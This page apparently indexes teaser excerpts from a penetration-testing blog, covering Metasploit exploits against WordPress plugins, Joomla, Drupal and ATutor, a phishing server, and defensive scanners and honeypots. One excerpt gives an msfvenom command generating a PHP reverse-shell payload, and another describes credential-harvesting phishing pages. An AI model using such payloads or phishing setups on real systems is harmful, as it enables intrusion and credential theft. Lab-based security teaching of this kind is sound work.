Clik here to view.
Hack Remote PC using WordPress Work the Flow Upload Vulnerability
This module exploits an arbitrary PHP code upload in the WordPress Work the Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution Exploit Targets...
View ArticleClik here to view.
Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload
Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to...
View ArticleClik here to view.
Exploit Remote PC using WordPress WordPress WPTouch Authenticated File Upload
The WordPress WPTouch plugin contains authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads...
View ArticleClik here to view.
Exploit Remote PC using WordPress InfusionSoft Upload Vulnerability
This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code...
View ArticleClik here to view.
Hack Remote PC using WordPress WP EasyCart Unrestricted File Upload
WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the...
View ArticleClik here to view.
Hack Remote Windows PC using Office OLE multiple DLL side loading...
Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a...
View ArticleClik here to view.
Setup Firewall Pentest Lab using Clear OS
Clear OS is basically a Linux based server operating system for small business which comes with server, networking and gateway related functions. Clear OS is available in a Home, Business and free...
View ArticleClik here to view.
Weeman – HTTP Server for Phishing
Weeman is a simple python http server script that creates powerful phishing page. It work just like other phishing framework, simply it takes credentials from users when they type confidential...
View ArticleClik here to view.
Hack Remote PC using Joomla HTTP Header Unauthenticated Remote Code Execution
Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the...
View ArticleClik here to view.
Hack Remote PC using PHP Utility Belt Remote Code Execution
This module exploits remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application...
View ArticleClik here to view.
Hack Remote PC using ATutor 2.2.1 SQL Injection / Remote Code Execution
This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s...
View ArticleClik here to view.
Vulnerability Scanning in Network using Retina
Retina is a network vulnerability scanner, one of the industry’s most powerful and effective vulnerability scanners. This network scanning tool gives pretty good vulnerability assessment experience and...
View ArticleClik here to view.
Information Gathering using Maltego (Beginner Guide)
Maltego is a great tool for penetration testers and forensic investigator’s which is used for open-source intelligence gathering and forensics. Maltego is totally different and powerful from other...
View ArticleClik here to view.
Hack Remote Server using WordPress Plugin Foxypress uploadify.php Arbitrary...
This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via...
View ArticleClik here to view.
Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and...
View ArticleClik here to view.
Detect Hacker in Network using kfsensor Honeypot
KFSensor is windows based Honeypot IDS (Intrusion Detection System), which acts as a honeypot to attract and detect hackers or other unauthorized users and Trojans by creating a virtual vulnerable...
View ArticleClik here to view.
How to identify Network Vulnerabilities using Nessus (Beginner Guide)
Every hackers or information security person is incomplete without a vulnerability scanner, especiallywithout Nessus vulnerability scanner. Because Nessus is a very powerful tool and world’s most...
View ArticleClik here to view.
Find Your Website History using Waybackpack
Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL Open your Kali Linux terminal and go to desktop and type the following command git clone...
View ArticleClik here to view.
Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)
Open your kali linux terminal and type msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw It will generate a raw code of php file Now copy the generated code in the text file...
View ArticleClik here to view.
Detect Vulnerability Scanner in Network using Kfsensor
In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every...
View Article